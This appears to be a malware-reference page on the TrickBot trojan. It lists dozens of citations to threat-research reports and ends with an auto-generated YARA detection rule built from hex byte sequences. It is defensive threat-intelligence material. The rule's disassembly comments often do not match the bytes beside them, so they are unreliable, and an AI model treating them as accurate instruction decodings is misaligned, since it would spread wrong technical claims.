@online{pinkas:20190402:triple:10a3e37, author = {Noa Pinkas and Lior Rochberger and Matan Zatz}, title = {{Triple Threat: Emotet Deploys Trickbot to Steal Data & Spread Ryuk}}, date = {2019-04-02}, organization = {Cybereason}, url = {https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware}, language = {English}, urldate = {2020-01-09} } Triple Threat: Emotet Deploys Trickbot to Steal Data & Spread Ryuk
Ryuk TrickBot
2019-03-05PepperMalware BlogPepper Potts
@online{potts:20190305:quick:773aabc, author = {Pepper Potts}, title = {{Quick Analysis of a Trickbot Sample with NSA's Ghidra SRE Framework}}, date = {2019-03-05}, organization = {PepperMalware Blog}, url = {http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html}, language = {English}, urldate = {2019-12-19} } Quick Analysis of a Trickbot Sample with NSA's Ghidra SRE Framework
TrickBot
2019-02-15CrowdStrikeBrendon Feeley, Bex Hartley
@online{feeley:20190215:sinful:729f693, author = {Brendon Feeley and Bex Hartley}, title = {{“Sin”-ful SPIDERS: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web}}, date = {2019-02-15}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/}, language = {English}, urldate = {2019-12-20} } “Sin”-ful SPIDERS: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web
Dyre IcedID TrickBot Vawtrak Lunar Spider WIZARD SPIDER
2019-02-12Trend MicroTrend Micro
@online{micro:20190212:trickbot:73576ba, author = {Trend Micro}, title = {{Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire}}, date = {2019-02-12}, organization = {Trend Micro}, url = {https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/}, language = {English}, urldate = {2020-01-12} } Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire
TrickBot
2019-01-11FireEyeKimberly Goody, Jeremy Kennelly, Jaideep Natu, Christopher Glyer
@online{goody:20190111:nasty:3c872d4, author = {Kimberly Goody and Jeremy Kennelly and Jaideep Natu and Christopher Glyer}, title = {{A Nasty Trick: From Credential Theft Malware to Business Disruption}}, date = {2019-01-11}, organization = {FireEye}, url = {https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html}, language = {English}, urldate = {2019-12-20} } A Nasty Trick: From Credential Theft Malware to Business Disruption
Ryuk TrickBot GRIM SPIDER WIZARD SPIDER
2018-12-12SecureDataWicus Ross
@online{ross:20181212:trickbot:7a0e2a6, author = {Wicus Ross}, title = {{The TrickBot and MikroTik connection}}, date = {2018-12-12}, organization = {SecureData}, url = {https://www.infosecurity-magazine.com/blogs/trickbot-mikrotik-connection/}, language = {English}, urldate = {2020-05-18} } The TrickBot and MikroTik connection
TrickBot
2018-12-05VIPREVIPRE Labs
@online{labs:20181205:trickbots:b45d588, author = {VIPRE Labs}, title = {{Trickbot’s Tricks}}, date = {2018-12-05}, organization = {VIPRE}, url = {https://labs.vipre.com/trickbots-tricks/}, language = {English}, urldate = {2020-01-09} } Trickbot’s Tricks
TrickBot
2018-11-12Malwarebyteshasherezade
@online{hasherezade:20181112:whats:e44d5f3, author = {hasherezade}, title = {{What’s new in TrickBot? Deobfuscating elements}}, date = {2018-11-12}, organization = {Malwarebytes}, url = {https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/}, language = {English}, urldate = {2019-12-20} } What’s new in TrickBot? Deobfuscating elements
TrickBot
2018-11-08FortinetXiaopeng Zhang
@online{zhang:20181108:deep:fca360c, author = {Xiaopeng Zhang}, title = {{Deep Analysis of TrickBot New Module pwgrab}}, date = {2018-11-08}, organization = {Fortinet}, url = {https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html}, language = {English}, urldate = {2019-11-17} } Deep Analysis of TrickBot New Module pwgrab
TrickBot
2018-11-01Trend MicroNoel Anthony Llimos, Carl Maverick Pascual
@online{llimos:20181101:trickbot:7d0ea94, author = {Noel Anthony Llimos and Carl Maverick Pascual}, title = {{Trickbot Shows Off New Trick: Password Grabber Module}}, date = {2018-11-01}, organization = {Trend Micro}, url = {https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module}, language = {English}, urldate = {2020-01-06} } Trickbot Shows Off New Trick: Password Grabber Module
TrickBot
2018-08-14CyberbitHod Gavriel
@online{gavriel:20180814:latest:7df6364, author = {Hod Gavriel}, title = {{Latest Trickbot Variant has New Tricks Up Its Sleeve}}, date = {2018-08-14}, organization = {Cyberbit}, url = {https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/}, language = {English}, urldate = {2019-11-26} } Latest Trickbot Variant has New Tricks Up Its Sleeve
TrickBot
2018-07-03Talos IntelligenceBen Baker, Holger Unterbrink
@online{baker:20180703:smoking:067be1f, author = {Ben Baker and Holger Unterbrink}, title = {{Smoking Guns - Smoke Loader learned new tricks}}, date = {2018-07-03}, organization = {Talos Intelligence}, url = {https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html}, language = {English}, urldate = {2019-10-14} } Smoking Guns - Smoke Loader learned new tricks
SmokeLoader TrickBot
2018-06-20OALabs
@online{oalabs:20180620:unpacking:e4d59a4, author = {OALabs}, title = {{Unpacking and Extracting TrickBot Malware Configuration With x64dbg and Python}}, date = {2018-06-20}, url = {https://www.youtube.com/watch?v=EdchPEHnohw}, language = {English}, urldate = {2019-12-24} } Unpacking and Extracting TrickBot Malware Configuration With x64dbg and Python
TrickBot
2018-06-13Github (JR0driguezB)Jorge Rodriguez
@online{rodriguez:20180613:trickbot:e004ae8, author = {Jorge Rodriguez}, title = {{TrickBot config files}}, date = {2018-06-13}, organization = {Github (JR0driguezB)}, url = {https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot}, language = {English}, urldate = {2019-07-11} } TrickBot config files
TrickBot
2018-04-16Random REsysopfb
@online{sysopfb:20180416:trickbot:5305f46, author = {sysopfb}, title = {{TrickBot & UACME}}, date = {2018-04-16}, organization = {Random RE}, url = {https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html}, language = {English}, urldate = {2020-01-09} } TrickBot & UACME
TrickBot
2018-04-03Vitali Kremez BlogVitali Kremez
@online{kremez:20180403:lets:b45dd50, author = {Vitali Kremez}, title = {{Let's Learn: Trickbot Implements Network Collector Module Leveraging CMD, WMI & LDAP}}, date = {2018-04-03}, organization = {Vitali Kremez Blog}, url = {http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html}, language = {English}, urldate = {2019-07-27} } Let's Learn: Trickbot Implements Network Collector Module Leveraging CMD, WMI & LDAP
TrickBot
2018-03-31Youtube (hasherezade)hasherezade
@online{hasherezade:20180331:deobfuscating:39c1be0, author = {hasherezade}, title = {{Deobfuscating TrickBot's strings with libPeConv}}, date = {2018-03-31}, organization = {Youtube (hasherezade)}, url = {https://www.youtube.com/watch?v=KMcSAlS9zGE}, language = {English}, urldate = {2020-01-13} } Deobfuscating TrickBot's strings with libPeConv
TrickBot
2018-03-27Trend MicroTrendmicro
@online{trendmicro:20180327:evolving:faa2e54, author = {Trendmicro}, title = {{Evolving Trickbot Adds Detection Evasion and Screen-Locking Features}}, date = {2018-03-27}, organization = {Trend Micro}, url = {https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features}, language = {English}, urldate = {2020-01-07} } Evolving Trickbot Adds Detection Evasion and Screen-Locking Features
TrickBot
2018-03-21WebrootJason Davison
@online{davison:20180321:trickbot:1f0576e, author = {Jason Davison}, title = {{TrickBot Banking Trojan Adapts with New Module}}, date = {2018-03-21}, organization = {Webroot}, url = {https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/}, language = {English}, urldate = {2020-01-13} } TrickBot Banking Trojan Adapts with New Module
TrickBot
2018-02-15SecurityIntelligenceOphir Harpaz, Magal Baz, Limor Kessem
@online{harpaz:20180215:trickbots:2cf1b53, author = {Ophir Harpaz and Magal Baz and Limor Kessem}, title = {{TrickBot’s Cryptocurrency Hunger: Tricking the Bitcoin Out of Wallets}}, date = {2018-02-15}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/}, language = {English}, urldate = {2020-01-06} } TrickBot’s Cryptocurrency Hunger: Tricking the Bitcoin Out of Wallets
TrickBot
2018-02-01Malware Traffic AnalysisBrad Duncan
@online{duncan:20180201:quick:320f855, author = {Brad Duncan}, title = {{Quick Test Drive of Trickbot (It now has a Monero Module)}}, date = {2018-02-01}, organization = {Malware Traffic Analysis}, url = {http://www.malware-traffic-analysis.net/2018/02/01/}, language = {English}, urldate = {2019-07-09} } Quick Test Drive of Trickbot (It now has a Monero Module)
TrickBot
2017-12-30Youtube (hasherezade)hasherezade
@online{hasherezade:20171230:unpacking:5477bb2, author = {hasherezade}, title = {{Unpacking TrickBot with PE-sieve}}, date = {2017-12-30}, organization = {Youtube (hasherezade)}, url = {https://www.youtube.com/watch?v=lTywPmZEU1A}, language = {English}, urldate = {2020-01-06} } Unpacking TrickBot with PE-sieve
TrickBot
2017-12-19Vitali Kremez BlogVitali Kremez
@online{kremez:20171219:lets:030e09a, author = {Vitali Kremez}, title = {{Let's Learn: Introducing New Trickbot LDAP "DomainGrabber" Module}}, date = {2017-12-19}, organization = {Vitali Kremez Blog}, url = {http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html}, language = {English}, urldate = {2019-11-23} } Let's Learn: Introducing New Trickbot LDAP "DomainGrabber" Module
TrickBot
2017-11-22FlashpointVitali Kremez
@online{kremez:20171122:trickbot:faea11e, author = {Vitali Kremez}, title = {{Trickbot Gang Evolves, Incorporates Account Checking Into Hybrid Attack Model}}, date = {2017-11-22}, organization = {Flashpoint}, url = {https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/}, language = {English}, urldate = {2019-12-10} } Trickbot Gang Evolves, Incorporates Account Checking Into Hybrid Attack Model
TrickBot
2017-11-21Vitali Kremez
@online{kremez:20171121:lets:5fb17b0, author = {Vitali Kremez}, title = {{Let's Learn: Trickbot Socks5 Backconnect Module In Detail}}, date = {2017-11-21}, url = {http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html}, language = {English}, urldate = {2019-11-22} } Let's Learn: Trickbot Socks5 Backconnect Module In Detail
TrickBot
2017-10-06BluelivBlueliv
@online{blueliv:20171006:trickbot:a2a9ac8, author = {Blueliv}, title = {{TrickBot banking trojan using EFLAGS as an anti-hook technique}}, date = {2017-10-06}, organization = {Blueliv}, url = {https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/}, language = {English}, urldate = {2020-01-08} } TrickBot banking trojan using EFLAGS as an anti-hook technique
TrickBot
2017-08-01MalwarebytesMalwarebytes Labs
@online{labs:20170801:trickbot:222d8bc, author = {Malwarebytes Labs}, title = {{TrickBot comes up with new tricks: attacking Outlook and browsing data}}, date = {2017-08-01}, organization = {Malwarebytes}, url = {https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/}, language = {English}, urldate = {2019-12-20} } TrickBot comes up with new tricks: attacking Outlook and browsing data
TrickBot
2017-07-27FlashpointFlashpoint
@online{flashpoint:20170727:new:bb5c883, author = {Flashpoint}, title = {{New Version of “Trickbot” Adds Worm Propagation Module}}, date = {2017-07-27}, organization = {Flashpoint}, url = {https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/}, language = {English}, urldate = {2020-01-13} } New Version of “Trickbot” Adds Worm Propagation Module
TrickBot
2017-07Ring Zero LabsRing Zero Labs
@online{labs:201707:trickbot:e738eaf, author = {Ring Zero Labs}, title = {{TrickBot Banking Trojan - DOC00039217.doc}}, date = {2017-07}, organization = {Ring Zero Labs}, url = {https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html}, language = {English}, urldate = {2020-01-10} } TrickBot Banking Trojan - DOC00039217.doc
TrickBot
2017-06-15F5Sara Boddy, Jesse Smith, Doron Voolf
@online{boddy:20170615:trickbot:6eb1db4, author = {Sara Boddy and Jesse Smith and Doron Voolf}, title = {{Trickbot Expands Global Targets Beyond Banks and Payment Processors to CRMs}}, date = {2017-06-15}, organization = {F5}, url = {https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms}, language = {English}, urldate = {2019-12-24} } Trickbot Expands Global Targets Beyond Banks and Payment Processors to CRMs
TrickBot
2017-06-12Security Art WorkMarc Salinas, JoséMiguel Holguín
@techreport{salinas:20170612:evolucin:9930231, author = {Marc Salinas and JoséMiguel Holguín}, title = {{Evolución de Trickbot}}, date = {2017-06-12}, institution = {Security Art Work}, url = {https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf}, language = {Spanish}, urldate = {2020-01-10} } Evolución de Trickbot
TrickBot
2017-05-26PWCBart Parys
@online{parys:20170526:trickbots:c1b84e1, author = {Bart Parys}, title = {{TrickBot’s bag of tricks}}, date = {2017-05-26}, organization = {PWC}, url = {http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html}, language = {English}, urldate = {2020-06-18} } TrickBot’s bag of tricks
TrickBot
2017-03-01FraudWatch InternationalFraudWatch International
@online{international:20170301:how:fb75ef9, author = {FraudWatch International}, title = {{How Does the Trickbot Malware Work?}}, date = {2017-03-01}, organization = {FraudWatch International}, url = {https://blog.fraudwatchinternational.com/malware/trickbot-malware-works}, language = {English}, urldate = {2020-01-08} } How Does the Trickbot Malware Work?
TrickBot
2016-12-07BotconfJoshua Adams
@techreport{adams:20161207:trickbot:fc3427c, author = {Joshua Adams}, title = {{The TrickBot Evolution}}, date = {2016-12-07}, institution = {Botconf}, url = {https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf}, language = {English}, urldate = {2020-01-09} } The TrickBot Evolution
TrickBot
2016-12-06FortinetXiaopeng Zhang
@online{zhang:20161206:deep:1f1521f, author = {Xiaopeng Zhang}, title = {{Deep Analysis of the Online Banking Botnet TrickBot}}, date = {2016-12-06}, organization = {Fortinet}, url = {http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot}, language = {English}, urldate = {2020-01-08} } Deep Analysis of the Online Banking Botnet TrickBot
TrickBot
2016-11-09Lior Keshet
@online{keshet:20161109:tricks:c3ab510, author = {Lior Keshet}, title = {{Tricks of the Trade: A Deeper Look Into TrickBot’s Machinations}}, date = {2016-11-09}, url = {https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/}, language = {English}, urldate = {2019-10-17} } Tricks of the Trade: A Deeper Look Into TrickBot’s Machinations
TrickBot
2016-11-07F5 LabsJulia Karpin, Shaul Vilkomir-Preisman, Anna Dorfman
@online{karpin:20161107:little:598f939, author = {Julia Karpin and Shaul Vilkomir-Preisman and Anna Dorfman}, title = {{Little Trickbot Growing Up: New Campaign}}, date = {2016-11-07}, organization = {F5 Labs}, url = {https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412}, language = {English}, urldate = {2020-01-06} } Little Trickbot Growing Up: New Campaign
TrickBot
2016-10-25NetScoutASERT Team
@online{team:20161025:trickbot:dd465d9, author = {ASERT Team}, title = {{TrickBot Banker Insights}}, date = {2016-10-25}, organization = {NetScout}, url = {https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/}, language = {English}, urldate = {2019-07-11} } TrickBot Banker Insights
TrickBot
2016-10-24MalwarebytesMalwarebytes Labs
@online{labs:20161024:introducing:e59ac27, author = {Malwarebytes Labs}, title = {{Introducing TrickBot, Dyreza’s successor}}, date = {2016-10-24}, organization = {Malwarebytes}, url = {https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/}, language = {English}, urldate = {2019-12-20} } Introducing TrickBot, Dyreza’s successor
TrickBot
2016-10-15Fidelis CybersecurityThreat Research Team
@online{team:20161015:trickbot:cc9f48f, author = {Threat Research Team}, title = {{TrickBot: We Missed you, Dyre}}, date = {2016-10-15}, organization = {Fidelis Cybersecurity}, url = {https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre}, language = {English}, urldate = {2019-11-28} } TrickBot: We Missed you, Dyre
TrickBot
Yara Rules
[TLP:WHITE] win_trickbot_auto (20200529 | autogenerated rule brought to you by yara-signator)
rule win_trickbot_auto {

    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2020-05-30"
        version = "1"
        description = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.4.0"
        tool_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot"
        malpedia_rule_date = "20200529"
        malpedia_hash = "92c362319514e5a6da26204961446caa3a8b32a8"
        malpedia_version = "20200529"
        malpedia_license = "CC BY-NC-SA 4.0"
        malpedia_sharing = "TLP:WHITE"

    /* DISCLAIMER
     * The strings used in this rule have been automatically selected from the
     * disassembly of memory dumps and unpacked files, using yara-signator.
     * The code and documentation / approach is published here:
     * https://github.com/fxb-cocacoding/yara-signator
     * As Malpedia is used as data source, please note that for a given
     * number of families, only single samples are documented.
     * This likely impacts the degree of generalization these rules will offer.
     * Take the described generation method also into consideration when you
     * apply the rules in your use cases and assign them confidence levels.
     */


    strings:
        $sequence_0 = { 83c010 eb25 a900000040 7411 2500000080 f7d8 }
            // n = 6, score = 4500
            //   83c010               | mov                 edx, dword ptr [ecx + 0x18]
            //   eb25                 | dec                 eax
            //   a900000040           | mov                 ecx, dword ptr [ecx + 0x10]
            //   7411                 | call                eax
            //   2500000080           | dec                 eax
            //   f7d8                 | mov                 eax, dword ptr [ecx + 0x38]

        $sequence_1 = { 83e020 83c020 eb36 2500000080 f7d8 1bc0 }
            // n = 6, score = 4500
            //   83e020               | dec                 esp
            //   83c020               | mov                 eax, dword ptr [ecx + 0x20]
            //   eb36                 | dec                 eax
            //   2500000080           | mov                 edx, dword ptr [ecx + 0x18]
            //   f7d8                 | dec                 eax
            //   1bc0                 | mov                 dword ptr [esp + 0x40], eax

        $sequence_2 = { f7d8 1bc0 83e002 83c002 eb0d }
            // n = 5, score = 4500
            //   f7d8                 | dec                 esp
            //   1bc0                 | mov                 eax, dword ptr [ecx + 0x20]
            //   83e002               | dec                 eax
            //   83c002               | mov                 edx, dword ptr [ecx + 0x18]
            //   eb0d                 | dec                 eax

        $sequence_3 = { 83e002 83c002 eb0d 2500000080 f7d8 1bc0 83e007 }
            // n = 7, score = 4500
            //   83e002               | mov                 ecx, dword ptr [ecx + 0x10]
            //   83c002               | dec                 eax
            //   eb0d                 | mov                 dword ptr [esp + 0x20], eax
            //   2500000080           | inc                 ecx
            //   f7d8                 | call                edx
            //   1bc0                 | dec                 eax
            //   83e007               | mov                 eax, dword ptr [ecx + 0x40]

        $sequence_4 = { f7d8 1bc0 83e070 83c010 eb25 }
            // n = 5, score = 4500
            //   f7d8                 | dec                 eax
            //   1bc0                 | mov                 dword ptr [esp + 0x28], eax
            //   83e070               | dec                 eax
            //   83c010               | mov                 eax, dword ptr [ecx + 0x30]
            //   eb25                 | dec                 eax

        $sequence_5 = { a900000020 7429 a900000040 7411 }
            // n = 4, score = 4500
            //   a900000020           | dec                 esp
            //   7429                 | mov                 ecx, dword ptr [ecx + 0x28]
            //   a900000040           | dec                 esp
            //   7411                 | mov                 eax, dword ptr [ecx + 0x20]

        $sequence_6 = { 7411 2500000080 f7d8 1bc0 83e020 83c020 eb36 }
            // n = 7, score = 4500
            //   7411                 | call                eax
            //   2500000080           | dec                 esp
            //   f7d8                 | mov                 ecx, dword ptr [ecx + 0x28]
            //   1bc0                 | dec                 esp
            //   83e020               | mov                 eax, dword ptr [ecx + 0x20]
            //   83c020               | dec                 eax
            //   eb36                 | mov                 edx, dword ptr [ecx + 0x18]

        $sequence_7 = { 83c724 8b07 a900000020 7429 }
            // n = 4, score = 3700
            //   83c724               | dec                 eax
            //   8b07                 | mov                 eax, dword ptr [ecx + 0x48]
            //   a900000020           | dec                 eax
            //   7429                 | mov                 dword ptr [esp + 0x38], eax

        $sequence_8 = { ff15???????? 8b45f8 3bc3 7407 50 }
            // n = 5, score = 3400
            //   ff15????????         |                     
            //   8b45f8               | mov                 ecx, dword ptr [ecx + 0x10]
            //   3bc3                 | dec                 eax
            //   7407                 | mov                 dword ptr [esp + 0x20], eax
            //   50                   | dec                 eax

        $sequence_9 = { 6a00 50 ffd2 8b45fc 8b08 8b9118010000 }
            // n = 6, score = 3300
            //   6a00                 | dec                 esp
            //   50                   | mov                 ecx, dword ptr [ecx + 0x28]
            //   ffd2                 | dec                 esp
            //   8b45fc               | mov                 eax, dword ptr [ecx + 0x20]
            //   8b08                 | dec                 eax
            //   8b9118010000         | mov                 edx, dword ptr [ecx + 0x18]

        $sequence_10 = { 8b08 8b9118010000 6a00 50 ffd2 }
            // n = 5, score = 3300
            //   8b08                 | dec                 eax
            //   8b9118010000         | mov                 dword ptr [esp + 0x38], eax
            //   6a00                 | dec                 eax
            //   50                   | mov                 eax, dword ptr [ecx + 0x40]
            //   ffd2                 | dec                 eax

        $sequence_11 = { 740b 83c102 48 75f5 }
            // n = 4, score = 3300
            //   740b                 | dec                 esp
            //   83c102               | mov                 eax, dword ptr [ecx + 0x20]
            //   48                   | dec                 eax
            //   75f5                 | mov                 edx, dword ptr [ecx + 0x18]

        $sequence_12 = { 8d55f8 52 50 8b81a4000000 ffd0 85c0 }
            // n = 6, score = 3300
            //   8d55f8               | mov                 dword ptr [esp + 0x30], eax
            //   52                   | dec                 eax
            //   50                   | mov                 dword ptr [esp + 0x38], eax
            //   8b81a4000000         | dec                 eax
            //   ffd0                 | mov                 eax, dword ptr [ecx + 0x40]
            //   85c0                 | dec                 eax

        $sequence_13 = { 8b45fc 8b08 8b9110010000 6a00 }
            // n = 4, score = 3300
            //   8b45fc               | mov                 edx, dword ptr [ecx + 0x18]
            //   8b08                 | dec                 eax
            //   8b9110010000         | mov                 ecx, dword ptr [ecx + 0x10]
            //   6a00                 | call                eax

        $sequence_14 = { 8b08 8d55f0 52 50 8b81b4000000 ffd0 }
            // n = 6, score = 3300
            //   8b08                 | mov                 dword ptr [esp + 0x30], eax
            //   8d55f0               | dec                 eax
            //   52                   | mov                 eax, dword ptr [ecx + 0x38]
            //   50                   | dec                 eax
            //   8b81b4000000         | mov                 eax, dword ptr [ecx + 0x50]
            //   ffd0                 | dec                 esp

        $sequence_15 = { 4c8b11 4c8b4928 4c8b4120 488b5118 4889442438 }
            // n = 5, score = 2800
            //   4c8b11               | dec                 eax
            //   4c8b4928             | mov                 dword ptr [esp + 0x30], eax
            //   4c8b4120             | dec                 eax
            //   488b5118             | mov                 eax, dword ptr [ecx + 0x38]
            //   4889442438           | dec                 eax

        $sequence_16 = { 488b4130 488b4910 4889442420 41ffd2 }
            // n = 4, score = 2800
            //   488b4130             | dec                 eax
            //   488b4910             | mov                 edx, dword ptr [ecx + 0x18]
            //   4889442420           | dec                 eax
            //   41ffd2               | mov                 dword ptr [esp + 0x38], eax

        $sequence_17 = { 4c8b4120 488b5118 4889442440 488b4148 4889442438 488b4140 }
            // n = 6, score = 2800
            //   4c8b4120             | mov                 eax, dword ptr [ecx + 0x20]
            //   488b5118             | dec                 eax
            //   4889442440           | mov                 edx, dword ptr [ecx + 0x18]
            //   488b4148             | dec                 eax
            //   4889442438           | mov                 dword ptr [esp + 0x38], eax
            //   488b4140             | dec                 eax

        $sequence_18 = { 488b4140 4889442430 488b4138 4889442428 488b4130 }
            // n = 5, score = 2800
            //   488b4140             | dec                 eax
            //   4889442430           | mov                 eax, dword ptr [ecx + 0x40]
            //   488b4138             | dec                 eax
            //   4889442428           | mov                 dword ptr [esp + 0x30], eax
            //   488b4130             | dec                 eax

        $sequence_19 = { 33db 53 53 6a03 53 6a01 6800010000 }
            // n = 7, score = 2800
            //   33db                 | sbb                 eax, eax
            //   53                   | and                 eax, 0x20
            //   53                   | add                 eax, 0x20
            //   6a03                 | jmp                 0x3b
            //   53                   | and                 eax, 0x80000000
            //   6a01                 | neg                 eax
            //   6800010000           | sbb                 eax, eax

        $sequence_20 = { 50 ff15???????? 8b4604 85c0 7407 50 ff15???????? }
            // n = 7, score = 2800
            //   50                   | sbb                 eax, eax
            //   ff15????????         |                     
            //   8b4604               | and                 eax, 7
            //   85c0                 | inc                 eax
            //   7407                 | test                eax, 0x20000000
            //   50                   | je                  0x3d
            //   ff15????????         |                     

        $sequence_21 = { 488b5118 4889442438 488b4140 4889442430 }
            // n = 4, score = 2800
            //   488b5118             | dec                 eax
            //   4889442438           | mov                 edx, dword ptr [ecx + 0x18]
            //   488b4140             | dec                 eax
            //   4889442430           | mov                 dword ptr [esp + 0x40], eax

        $sequence_22 = { 488b01 4c8b4120 488b5118 488b4910 ffd0 }
            // n = 5, score = 2800
            //   488b01               | mov                 edx, dword ptr [ecx + 0x18]
            //   4c8b4120             | dec                 eax
            //   488b5118             | mov                 dword ptr [esp + 0x38], eax
            //   488b4910             | dec                 eax
            //   ffd0                 | mov                 eax, dword ptr [ecx + 0x40]

        $sequence_23 = { 48397c2430 0f94c3 8bc3 488b5c2450 }
            // n = 4, score = 2500
            //   48397c2430           | dec                 eax
            //   0f94c3               | mov                 eax, dword ptr [ecx + 0x38]
            //   8bc3                 | dec                 eax
            //   488b5c2450           | mov                 dword ptr [esp + 0x28], eax

        $sequence_24 = { 75f5 5f 8bc6 5e 8be5 }
            // n = 5, score = 2500
            //   75f5                 | jne                 0xfffffff7
            //   5f                   | pop                 edi
            //   8bc6                 | mov                 eax, esi
            //   5e                   | pop                 esi
            //   8be5                 | mov                 esp, ebp

        $sequence_25 = { 817c243003010000 0f94c3 8bc3 4883c420 }
            // n = 4, score = 2300
            //   817c243003010000     | mov                 eax, dword ptr [ecx + 0x20]
            //   0f94c3               | dec                 eax
            //   8bc3                 | mov                 edx, dword ptr [ecx + 0x18]
            //   4883c420             | dec                 eax

        $sequence_26 = { 56 ff15???????? 83f8ff 740b }
            // n = 4, score = 2000
            //   56                   | test                eax, 0x40000000
            //   ff15????????         |                     
            //   83f8ff               | je                  0x2c
            //   740b                 | and                 eax, 0x80000000

        $sequence_27 = { e8???????? 488bcf e8???????? 48891e }
            // n = 4, score = 1900
            //   e8????????           |                     
            //   488bcf               | je                  0x30
            //   e8????????           |                     
            //   48891e               | test                eax, 0x40000000

        $sequence_28 = { 85f6 7424 8b06 85c0 7407 }
            // n = 5, score = 1900
            //   85f6                 | and                 eax, 2
            //   7424                 | add                 eax, 2
            //   8b06                 | jmp                 0x1e
            //   85c0                 | jmp                 0x38
            //   7407                 | and                 eax, 0x80000000

        $sequence_29 = { ff15???????? 85c0 7405 488bfb }
            // n = 4, score = 1800
            //   ff15????????         |                     
            //   85c0                 | and                 eax, 0x80000000
            //   7405                 | neg                 eax
            //   488bfb               | sbb                 eax, eax

        $sequence_30 = { 48894c2428 488bce 4889442420 e8???????? }
            // n = 4, score = 1700
            //   48894c2428           | dec                 eax
            //   488bce               | mov                 dword ptr [esp + 0x38], eax
            //   4889442420           | dec                 eax
            //   e8????????           |                     

        $sequence_31 = { eb08 488bcb e8???????? 488bc7 }
            // n = 4, score = 1700
            //   eb08                 | mov                 ecx, dword ptr [ecx + 0x10]
            //   488bcb               | dec                 eax
            //   e8????????           |                     
            //   488bc7               | mov                 dword ptr [esp + 0x20], eax

        $sequence_32 = { e8???????? 488bf0 4885c0 0f8487000000 }
            // n = 4, score = 1700
            //   e8????????           |                     
            //   488bf0               | mov                 dword ptr [esp + 0x30], eax
            //   4885c0               | dec                 esp
            //   0f8487000000         | mov                 eax, dword ptr [ecx + 0x20]

        $sequence_33 = { 488d4dc0 ff15???????? 488d4dd8 ff15???????? }
            // n = 4, score = 1700
            //   488d4dc0             | dec                 eax
            //   ff15????????         |                     
            //   488d4dd8             | mov                 eax, dword ptr [ecx + 0x48]
            //   ff15????????         |                     

        $sequence_34 = { 488bcf e8???????? 488bcb e8???????? 33c0 488b5c2440 }
            // n = 6, score = 1700
            //   488bcf               | mov                 dword ptr [esp + 0x28], eax
            //   e8????????           |                     
            //   488bcb               | dec                 eax
            //   e8????????           |                     
            //   33c0                 | mov                 eax, dword ptr [ecx + 0x30]
            //   488b5c2440           | dec                 eax

        $sequence_35 = { 488b4808 4885c9 7409 e8???????? }
            // n = 4, score = 1700
            //   488b4808             | dec                 eax
            //   4885c9               | mov                 edx, dword ptr [ecx + 0x18]
            //   7409                 | dec                 eax
            //   e8????????           |                     

        $sequence_36 = { 740d 4d85e4 7408 498bcc }
            // n = 4, score = 1700
            //   740d                 | mov                 ecx, dword ptr [ecx + 0x10]
            //   4d85e4               | call                eax
            //   7408                 | dec                 esp
            //   498bcc               | mov                 eax, dword ptr [ecx + 0x20]

        $sequence_37 = { 4c8d45f0 33d2 488bc8 e8???????? 85c0 }
            // n = 5, score = 1600
            //   4c8d45f0             | lea                 edi, [edx - 1]
            //   33d2                 | dec                 esp
            //   488bc8               | lea                 ecx, [esp + 0x58]
            //   e8????????           |                     
            //   85c0                 | dec                 eax

        $sequence_38 = { 48895c2428 4889442420 ff15???????? 85c0 }
            // n = 4, score = 1600
            //   48895c2428           | mov                 edx, edi
            //   4889442420           | test                eax, eax
